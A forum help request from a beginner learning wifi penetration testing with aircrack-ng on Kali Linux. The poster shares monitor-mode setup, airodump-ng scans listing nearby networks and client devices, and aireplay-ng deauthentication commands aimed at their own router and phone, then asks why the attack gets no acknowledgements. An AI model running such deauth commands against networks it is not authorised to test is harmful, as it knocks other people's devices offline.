Hi all

Im new in wifi pentest and i try to learn the aircrack-ng suite :
I have a ALFA AWUS1900 network adaptor successfully connected to my kali-linux.
I try to do an deauth attack.
There is more information :
LSUSB┌──(root💀kali)-[/home/kali]
└─# lsusb
Bus 001 Device 002: ID 0bda:8813 Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac Wireless Adapter
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 002: ID 80ee:0021 VirtualBox USB Tablet
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
AIRMON-NG┌──(root💀kali)-[/home/kali]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 88XXau Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
AIRMON-NG start wlan0┌──(root💀kali)-[/home/kali]
└─# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 88XXau Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
(monitor mode enabled)
IWCONFIG┌──(root💀kali)-[/home/kali]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
So i can start
airodump-ng wlan0 :
CH 2 ][ Elapsed: 57 s ][ 2021-08-06 04:50
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
3C:28:6D:81:91:C1 -30 158 2 0 6 130 WPA2 CCMP PSK Google Wifi
34:27:92:51:72:98 -56 150 0 0 11 195 WPA2 CCMP MGT FreeWifi_secure
B8:66:85:86:E3:50 -56 118 89 10 1 130 WPA2 CCMP PSK Bbox-250420B6
34:27:92:51:72:96 -55 151 0 0 11 195 WPA2 CCMP PSK Freebox-517295
D4:F8:29:53:6A:F0 -64 83 0 0 1 130 WPA2 CCMP PSK Livebox-6AF0
30:93:BC:9E:BF:70 -69 178 0 0 11 130 WPA2 CCMP PSK Livebox-BF70
62:2D:1B:BC:45:07 -71 63 0 0 1 130 OPN SFR WiFi FON
A4:3E:51:08:C5:33 -75 144 0 0 6 130 WPA2 CCMP PSK Livebox-C533
18:1E:78:D6:48:76 -75 86 10 0 1 195 WPA2 CCMP PSK XXXX-4870
D0:84:B0:68:15:F4 -78 109 0 0 6 130 WPA2 CCMP PSK Livebox-15F4
D0:84:B0:F5:03:26 -78 85 0 0 1 195 WPA2 CCMP PSK Numericable-0320
70:FC:8F:3E:29:B8 -79 25 2 0 1 195 WPA2 CCMP PSK freebox_LZJOMH
80:CE:62:AE:D1:47 -79 34 0 0 6 65 WPA2 CCMP PSK DIRECT-45-HP DeskJet 2600 series
70:FC:8F:3E:29:BA -81 26 0 0 1 195 WPA2 CCMP MGT FreeWifi_secure
68:A3:78:D0:D0:24 -82 20 0 0 11 195 WPA2 CCMP PSK freebox_OFLTNP
CC:19:A8:15:48:80 -82 26 7 0 11 260 WPA2 CCMP PSK SFR_487F
68:A3:78:D0:D0:26 -83 20 0 0 11 195 WPA2 CCMP MGT FreeWifi_secure
DC:00:B0:AB:8E:A0 -83 22 0 0 6 130 WPA2 CCMP PSK BAZAR
24:7F:20:89:55:9A -83 27 2 0 1 130 WPA2 CCMP PSK XXXX-5594
62:2D:1B:BC:45:05 -71 64 0 0 1 130 WPA2 CCMP MGT SFR WiFi Mobile
CC:2D:1B:BC:45:06 -71 60 24 0 1 130 WPA2 CCMP PSK SFR_4500
70:FC:8F:57:D4:15 -84 17 0 0 6 195 WPA2 CCMP MGT FreeWifi_secure
DE:00:B0:AB:8E:A1 -84 22 1 0 6 130 WPA3 CCMP SAE <length: 0>
24:7F:20:B2:12:7E -84 23 14 0 1 130 WPA2 CCMP PSK I like the way you die, boy !
3C:17:10:E9:CC:FE -84 36 0 0 1 130 WPA2 CCMP PSK SFR-ccf8
B0:BB:E5:19:28:36 -85 1 2 0 11 260 WPA2 CCMP PSK Bbox-922F8D30
70:FC:8F:57:D4:13 -86 17 0 0 6 195 WPA2 CCMP PSK Freebox-57D412
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) F4:0F:24:18:63:24 -61 0 - 1 0 8
(not associated) 18:60:24:DA:DB:A3 -71 0 - 1 174 37 Kumi & Drinbis
(not associated) 00:0E:58:F3:3E:27 -72 0 - 1 0 15 Sonos_Uu08NDVh8SKzlRaW0CqHORkNCC
(not associated) 00:0E:58:F3:3E:26 -69 0 - 1 66 157 Livebox-4554
(not associated) EC:66:D1:0E:FD:20 -75 0 - 1 0 20 SFR-7820
(not associated) F2:1D:AD:97:27:78 -77 0 - 1 0 1
(not associated) 00:20:00:77:D6:38 -81 0 - 1 0 3 jeep
(not associated) 48:D6:D5:7D:F3:41 -83 0 - 1 0 3
(not associated) 60:F2:62:BC:37:89 -83 0 - 1 0 1 WIFI_JUSTICE
3C:28:6D:81:91:C1 9A:3E:C0:3E:37:B9 -41 0 - 1 0 1
B8:66:85:86:E3:50 40:A9:CF:D4:25:CE -65 1e- 1e 0 8
18:1E:78:D6:48:76 6A:B6:6F:03:42:43 -1 1e- 0 0 1
Quitting...
My wifi network is 'Google Wifi', i use a google wifi router and my smartphone (android s10) is connected to this router.
I have an other portable computer connected in wifi to this router.
My problem are airodump catch a very small amount of DATA, is it normal with 2 appareils connected ? I see 0 in #/s so its capturing 0 packets per sec ?
I was trying to catch only packets coming from my router with 'airodump-ng --bssid 3C:28:6D:81:91:C1 wlan0 --channel 6' but before i try to remake an 'airodump-ng wlan0' and this happened :
CH 2 ][ Elapsed: 1 min ][ 2021-08-06 04:47
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 00:0E:58:F3:3E:26 -69 0 - 1 213 169 Livebox-4554
(not associated) 00:0E:58:F3:3E:27 -71 0 - 1 0 10 Sonos_Uu08NDVh8SKzlRaW0CqHORkNCC
(not associated) EC:66:D1:0E:FD:20 -73 0 - 1 0 29 SFR-7820
(not associated) 18:60:24:DA:DB:A3 -75 0 - 1 0 17 Kumi & Drinbis
(not associated) 60:F2:62:BC:37:89 -83 0 - 1 0 3 WIFI-JUSTICE,WIFI_JUSTICE
(not associated) 00:20:00:77:D6:38 -85 0 - 1 13 5 jeep
Quitting...
I cant see APs anymore

i have desactived monitore mode and put it back and APs come back on airmon-ng, pfiou

So i launch my command to capture only packets from my AP :
airodump-ng --bssid 3C:28:6D:81:91:C1 wlan0 --channel 6 CH 6 ][ Elapsed: 24 s ][ 2021-08-06 04:51 ][ fixed channel wlan0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
3C:28:6D:81:91:C1 -32 63 196 66 2 6 130 WPA2 CCMP PSK Google Wifi
BSSID STATION PWR Rate Lost Frames Notes Probes
3C:28:6D:81:91:C1 9A:3E:C0:3E:37:B9 -43 1e- 1 10 109
Quitting...
And i got the 'fixed channel wlan0: -1'
(i dont see my laptop btw)
I try to do the deauth attack on my smartphone : aireplay-ng --deauth 2000 -a 3C:28:6D:81:91:C1 -c 9A:3E:C0:3E:37:B9 wlan0
but i got this result :
┌──(root💀kali)-[/home/kali]
└─# aireplay-ng --deauth 2000 -a 3C:28:6D:81:91:C1 -c 9A:3E:C0:3E:37:B9 wlan0
04:54:07 Waiting for beacon frame (BSSID: 3C:28:6D:81:91:C1) on channel -1
04:54:07 Couldn't determine current channel for wlan0, you should either force the operation with --ignore-negative-one or apply a kernel patch
and i think using the --ignore-negative-one is not a good way to exploit airecrack-ng ? its more how to bypass this error ?
i try with the option :
──(root💀kali)-[/home/kali]
└─# aireplay-ng --ignore-negative-one --deauth 2000 -a 3C:28:6D:81:91:C1 -c 9A:3E:C0:3E:37:B9 wlan0 1 ⨯
04:55:25 Waiting for beacon frame (BSSID: 3C:28:6D:81:91:C1) on channel -1
04:55:26 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:27 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:27 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:28 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:29 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:29 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
04:55:30 Sending 64 directed DeAuth (code 7). STMAC: [9A:3E:C0:3E:37:B9] [ 0| 0 ACKs]
and i let it run for a while but my smartphone stay connected to the router

Sorry for this long message, i try (and i say try a lot of time) do to my best to explain my problem !
Thanks in advance if you can help me !